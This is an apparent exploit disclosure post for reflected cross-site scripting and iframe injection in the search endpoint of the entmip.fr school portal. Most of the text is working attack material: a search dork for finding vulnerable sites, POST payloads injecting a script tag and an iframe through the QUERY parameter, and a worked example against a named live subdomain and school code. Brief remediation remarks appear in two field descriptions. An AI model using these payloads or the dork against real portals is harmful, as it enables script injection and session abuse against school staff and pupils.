----------------------------------------------------------------------
[Description]
#Exploit title: Entmip Reflected XSS & Iframe Injection
#Exploit author: Implosion
#Date: 18/12/2016
#Dorks: site:.entmip.fr -site:www.xxx.com
#Website: entmip.fr
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability][Reflected XSS]
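#URL: http://XXXXXX.entmip.fr/sg.do
#Parameter: QUERY (POST body) - its value is reflected into the response without HTML encoding; the leading "> suggests it lands inside a quoted attribute value (not confirmed here).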
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><script>alert('1')</script>+&x=0&y=0
----------------------------------------------------------------------
[Vulnerability][Iframe Injection]
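#URL: http://XXXXXX.entmip.fr/sg.do
#Parameter: QUERY (POST body) - same request and parameter as the Reflected XSS entry; this is HTML injection through the same unencoded value, so context-aware output encoding of QUERY addresses both findings, with a Content-Security-Policy as defence in depth.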
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><iframe src=https://cxsecurity.com>+&x=0&y=0
----------------------------------------------------------------------
[Example]
#URL: http://labarousse.entmip.fr/sg.do
#POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=6469&QUERY="><script>alert('1')</script>%2B&x=0&y=0
----------------------------------------------------------------------
#Discovered By Implosion
----------------------------------------------------------------------